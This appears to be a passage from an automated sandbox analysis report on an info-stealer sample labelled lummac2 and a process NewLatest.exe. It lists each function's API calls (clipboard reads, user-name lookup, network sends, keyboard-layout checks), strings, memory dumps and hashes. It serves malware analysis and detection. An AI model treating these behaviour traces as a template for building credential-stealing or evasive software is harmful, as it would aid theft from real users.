Instruction Fuzzy Hash: 7A1130B0615281CFDB1CCF19D8A0726BBA2FF99344B24886DD8868F35AD735D506CF94

Function 005E67AE Relevance: 1.5, APIs: 1, Instructions: 14
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 005E67B8

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bd565ae4ae17744e4813edf12f1eb7da6730865c2a3c02d63d1c5973d7b0c15b
Instruction ID: bf74f638d7f907be3f115afcdbbcbd71bc4bf5606ed15ac057e4c5c9db4a02b1
Opcode Fuzzy Hash: bd565ae4ae17744e4813edf12f1eb7da6730865c2a3c02d63d1c5973d7b0c15b
Instruction Fuzzy Hash: EBC08C383891146AE22AC7128CC1F3B3E2AEFDBE54F24800CF006432948728A802E17C

Non-executed Functions

Function 005DDDE0 Relevance: 9.2, APIs: 6, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 005DDE3D
GetWindowLongW.USER32 ref: 005DDE60
GetClipboardData.USER32 ref: 005DDE72
GlobalLock.KERNEL32 ref: 005DDE8E
GlobalUnlock.KERNEL32 ref: 005DDFB2
CloseClipboard.USER32 ref: 005DDFBE

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 11af0bfba9fbd15e0589cce103ea54200ec9a286621e78e24aca235263084e81
Instruction ID: eb26bbbe267730d986a444aed822ddb0426adb14c32f68b79b98fa050bc88b0b
Opcode Fuzzy Hash: 11af0bfba9fbd15e0589cce103ea54200ec9a286621e78e24aca235263084e81
Instruction Fuzzy Hash: F7611BB1508B42DFC325DF3CC885616BFF0BB5A310B148A5EE4EA8B791D734A415DBA2

Function 005CCF79 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 473COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000,00000000,?), ref: 005CD12E
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000,?,?), ref: 005CD159

Strings

\], xrefs: 005CD06B

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: \]
API String ID: 237503144-1108159982
Opcode ID: 99114c61a0fe18dde440bbc3b9a1c17cf1d91c0b8e631379b71c78baafd95524
Instruction ID: 5cf515af03c3a8bf0d5874c528d63e687a5331ed0a68c5aaadfda89bafce93a3
Opcode Fuzzy Hash: 99114c61a0fe18dde440bbc3b9a1c17cf1d91c0b8e631379b71c78baafd95524
Instruction Fuzzy Hash: 79F1AD75608351CFE318CF18C890B6AB7E2FFC5354F19896CE89997291C739E906CB92

Function 005DD1DF Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a918e0768a8badd7ac7686d86d0882e14763043e5b2231c9e116af4133464b
Instruction ID: 387f3966a93fc7ea5e37b7dd31b165cbb7b6acb1cd829b23641575d279661f88
Opcode Fuzzy Hash: 17a918e0768a8badd7ac7686d86d0882e14763043e5b2231c9e116af4133464b
Instruction Fuzzy Hash: 43F0F8B59083918FC720DF24C55974FBBE5BB88308F41892CD99957345C775A9498B82

Function 005CD8A0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 139COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 005CD9D2
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 005CDA01

Strings

]9I;, xrefs: 005CD91F
|-\/, xrefs: 005CD907
]5Z7, xrefs: 005CD917
M%T', xrefs: 005CD8F7
R!@#, xrefs: 005CD8EF
<=, xrefs: 005CD92B
_1T3, xrefs: 005CD90F
L)v+, xrefs: 005CD8FF

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: <=$L)v+$M%T'$R!@#$]5Z7$]9I;$_1T3$|-\/
API String ID: 237503144-3305864376
Opcode ID: 530979949da13f5789463b96802d046cb3c1dfc14334df9871815ef44c61c902
Instruction ID: 75e4b617d7bfd9ebd3cf32016db7966b2cf526748826cca2bee0ea8aff47d07a
Opcode Fuzzy Hash: 530979949da13f5789463b96802d046cb3c1dfc14334df9871815ef44c61c902
Instruction Fuzzy Hash: 605122B0208341AFD304CF04D894B5BBBF6ABC5794F108A2CF8A99B291D770D949CB96

Function 005C2510 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 382COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 005C2A1A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 005C2A4B

Strings

Q, xrefs: 005C2679
b, xrefs: 005C2810
:9a, xrefs: 005C2A51

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: :9a$b$Q
API String ID: 237503144-1159647205
Opcode ID: 56177053d4ef4a0e281e5df93d10338a7024250e52539f8802a1e9a015e6547c
Instruction ID: 759fce6b89b154514edd946869998549eebbecddfe1128d541c906af013d6657
Opcode Fuzzy Hash: 56177053d4ef4a0e281e5df93d10338a7024250e52539f8802a1e9a015e6547c
Instruction Fuzzy Hash: 77D13C716293818FD334CF14C499B9BBBE5BFC6304F04482DE8898B252D7799945CBA7

Function 005DEF62 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 005DEF85
SelectObject.GDI32 ref: 005DEFDF
SelectObject.GDI32 ref: 005DF061
DeleteObject.GDI32 ref: 005DF09E

Strings

, xrefs: 005DF02E

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: Object$DeleteSelect
String ID:
API String ID: 618127014-3916222277
Opcode ID: 9f5293150fb2c3ac77195c6cfd72410e82e9456dc9caf7ea522e64a33e00cd51
Instruction ID: 6756f8111988c2eb79873725467bc68a88a4e88943fbe19068be93e2b9a90b50
Opcode Fuzzy Hash: 9f5293150fb2c3ac77195c6cfd72410e82e9456dc9caf7ea522e64a33e00cd51
Instruction Fuzzy Hash: 16516EB8605B408FC364DF29D594A16BBF1FF99310B10896DE88A8BB60D731F849DF51

Function 005D2D80 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 315COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 005D2F10
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 005D2F41

Strings

3a, xrefs: 005D3172
QS, xrefs: 005D30A9

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 3a$QS
API String ID: 237503144-4289288903
Opcode ID: 4dfbac0ec34de11d96858c9b1d6fa58b00a476c2541e2b336f8d745602b9c7c2
Instruction ID: 8c679053fe4874e2bdcfe68e8841790a7ed6ffefa90c9970278703f97b419232
Opcode Fuzzy Hash: 4dfbac0ec34de11d96858c9b1d6fa58b00a476c2541e2b336f8d745602b9c7c2
Instruction Fuzzy Hash: 51C106B1600B518FD334CF29C895BA7BBE5AB45314F404A1DE9EB9BB85D770B405CB81

Function 005CD020 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000,00000000,?), ref: 005CD12E
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000,?,?), ref: 005CD159

Strings

\], xrefs: 005CD06B

Memory Dump Source

Source File: 00000008.00000002.2296676146.00000000005B1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000008.00000002.2296643185.00000000005B0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296793390.00000000005ED000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296895615.00000000005F0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2296925620.00000000005F9000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2297004474.0000000000603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5b0000_lummac2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: \]
API String ID: 237503144-1108159982
Opcode ID: 9264ee023bf958cf57ff7fe465a035b20dbd22fb0799a6e5f81cd1148e98298d
Instruction ID: 8c92bfe5fd77df951b1c6644d4560a903a056fb448a99f5bd65400b82371c5ae
Opcode Fuzzy Hash: 9264ee023bf958cf57ff7fe465a035b20dbd22fb0799a6e5f81cd1148e98298d
Instruction Fuzzy Hash: 736168751083918BD724DF14C890BABBBE5FFC5314F048A2CE8DA9B381D7749905CBA2

Analysis Process: NewLatest.exePID: 1988, Parent PID: 6024COMMON

Executed Functions

Function 000DA909 Relevance: 31.3, APIs: 15, Strings: 2, Instructions: 1503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryA.KERNEL32(00000000,E20BEACA,00000000), ref: 000DA90C

Strings

@3P, xrefs: 000DB821
VUUU, xrefs: 000DAE82

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID: @3P$VUUU
API String ID: 1611563598-3039269687
Opcode ID: 8cb3f01ddc9f7e684aec82af8c14559c729485e868032b6adb9fec929ea70961
Instruction ID: 232c066e3e2a2fc60511697494d65d673bbdf983c6ab819d56a74e1e1112425f
Opcode Fuzzy Hash: 8cb3f01ddc9f7e684aec82af8c14559c729485e868032b6adb9fec929ea70961
Instruction Fuzzy Hash: E9C2CD71A00258DFDB18DF28CC89BDEBBB5EF45304F508199F409A7392DB759A84CB61

Function 000D9910 Relevance: 24.7, APIs: 16, Instructions: 655
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000D8A40: GetTempPathA.KERNEL32(00000104,?,E20BEACA,?,00000000), ref: 000D8A87

GetFileAttributesA.KERNEL32(00000000), ref: 000D9983

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID:
API String ID: 3199926297-0
Opcode ID: c9c06ee4e1f195452fd83bf6744d3ba9a05959ba55660a4e2f8ce04c95a7a064
Instruction ID: a25f0f723611c0ee13580e6e89cfd97914ee7886d90bea498ee69de135d78f75
Opcode Fuzzy Hash: c9c06ee4e1f195452fd83bf6744d3ba9a05959ba55660a4e2f8ce04c95a7a064
Instruction Fuzzy Hash: 8D42AE70A00348DFEF14EBA8C9497DEBBB1AB16314F64824AD411773D3D7B54A849BB2

Function 000D7CE0 Relevance: 7.9, APIs: 5, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,E20BEACA), ref: 000D7D5A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D7DBB
GetProcAddress.KERNEL32(00000000), ref: 000D7DC2
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D7E83
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D7E87

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID:
API String ID: 374719553-0
Opcode ID: 94736bb5359d10e3f4afaa685dbe51bac94f1a06903dc9b78c53cba31887779d
Instruction ID: 29f0adb63f93cf8af0185d4e7c839e1571db026ea093855c50326a885f6695eb
Opcode Fuzzy Hash: 94736bb5359d10e3f4afaa685dbe51bac94f1a06903dc9b78c53cba31887779d
Instruction Fuzzy Hash: 13D12C71E007549BDB14BB28DD4A3ED7B71AB46324F9042CEE859A73C2DB744E848BD2

Function 0010643B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0010643A,?,?,?,?,?,0010748E), ref: 0010645D
TerminateProcess.KERNEL32(00000000,?,0010643A,?,?,?,?,?,0010748E), ref: 00106464
ExitProcess.KERNEL32 ref: 00106476

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 091bd4f30352d5ac9da90d92fdce764a187b7c4944a20911504f536b9a58d377
Instruction ID: 8e468ccef380c530f7444993d2e55432ac1189bdf7ba4fad31b1f517c52e4a55
Opcode Fuzzy Hash: 091bd4f30352d5ac9da90d92fdce764a187b7c4944a20911504f536b9a58d377
Instruction Fuzzy Hash: E9E0B631010A48EBCB626F54DC19A483B69FF58741F008514F845D6972DB75DDE2CA81

Function 000DB0A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 000DB0ED

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a6ba5e48871af02f4b1e3c25684f6419f9b5ca754939e8c5e6f6302623dec066
Instruction ID: f26f6ca84b942149e403018f24073606a2f3a89e4105534263767f515e4166f3
Opcode Fuzzy Hash: a6ba5e48871af02f4b1e3c25684f6419f9b5ca754939e8c5e6f6302623dec066
Instruction Fuzzy Hash: DB211AB181015C9FDB2ADF14CD65BEAB7B8EB19704F0042E9E50A63281D7746B88CFA0

Function 000D5B00 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 000D5FEA
0000043f, xrefs: 000D601B
Keyboard Layout\Preload, xrefs: 000D5F44
00000419, xrefs: 000D5F88
00000422, xrefs: 000D5FB9

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 904fe95e80245495a14fc51140a27559ae996195d679fc6bac43f4a0694aae0f
Instruction ID: eb48517b1f3cfbcf77d5eb3650a5fbb2bf0fcad3a94c8c926a4a99c35b8cf33c
Opcode Fuzzy Hash: 904fe95e80245495a14fc51140a27559ae996195d679fc6bac43f4a0694aae0f
Instruction Fuzzy Hash: 43F1B070900258AFEB24DF54CC89BDEBBB5EB44304F5041A9F919A7682DB749AC4CFA1

Function 0011195C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00111615: CreateFileW.KERNELBASE(00000000,00000000,?,00111A05,?,?,00000000,?,00111A05,00000000,0000000C), ref: 00111632

GetLastError.KERNEL32 ref: 00111A70
__dosmaperr.LIBCMT ref: 00111A77
GetFileType.KERNELBASE(00000000), ref: 00111A83
GetLastError.KERNEL32 ref: 00111A8D
__dosmaperr.LIBCMT ref: 00111A96
CloseHandle.KERNEL32(00000000), ref: 00111AB6
CloseHandle.KERNEL32(0010AB32), ref: 00111C03
GetLastError.KERNEL32 ref: 00111C35
__dosmaperr.LIBCMT ref: 00111C3C

Strings

H, xrefs: 00111BC1

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 8ba67ba4f09c2f94f7c5a335627e43495df994efeb5e84f451bb97fb075a9e3d
Instruction ID: 0325155c622ce9138b3dd9b5e0d29866b1ce1ebe3331f238ad8f92136b7ce378
Opcode Fuzzy Hash: 8ba67ba4f09c2f94f7c5a335627e43495df994efeb5e84f451bb97fb075a9e3d
Instruction Fuzzy Hash: A9A16632A04144AFDF1D9F68EC91BEDBBB1AF06324F140169F911AB2D1D7749892CB51

Function 000DD67C Relevance: 13.9, APIs: 9, Instructions: 446
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000DD7F3
CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 000DD90F
send.WS2_32(?,?,00000004,00000000), ref: 000DDB0E
send.WS2_32(?,?,00000008,00000000), ref: 000DDB4A

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: send$CreateDirectoryFileModuleName
String ID:
API String ID: 2319890793-0
Opcode ID: f3d531413716ef0be6af72cf5543f3a170a6ef382f9d19fad1fa05afd9772d55
Instruction ID: e19997eef905268f918b97c9437eef17c667e13f31777e71833ba9c3fd97ce59
Opcode Fuzzy Hash: f3d531413716ef0be6af72cf5543f3a170a6ef382f9d19fad1fa05afd9772d55
Instruction Fuzzy Hash: BDF10371E043589BDB24DB28CC49BDDBBB5AF45314F1042DAE419A7382EB719EC4CBA1

Function 000DD9AC Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

